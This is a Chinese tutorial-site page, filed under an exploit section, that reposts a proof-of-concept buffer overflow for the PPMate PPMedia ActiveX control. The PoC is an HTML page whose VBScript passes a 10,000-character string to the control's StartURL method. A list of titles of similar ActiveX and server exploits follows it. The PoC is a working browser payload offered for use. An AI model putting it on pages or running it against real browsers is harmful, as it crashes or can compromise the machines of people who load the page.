手机
当前位置:查字典教程网 >网络安全 >Exploit >PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
摘要:arg1=String(10000,"A")target.StartURL(arg1)

<html>

<body> <object id=target

classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>

<script language=vbscript> arg1=String(10000, "A")

target.StartURL(arg1) </script>

</body>

</html>

【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

EO Video 1.36 Local Heap Overflow DOS / PoC

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

精品推荐
分类导航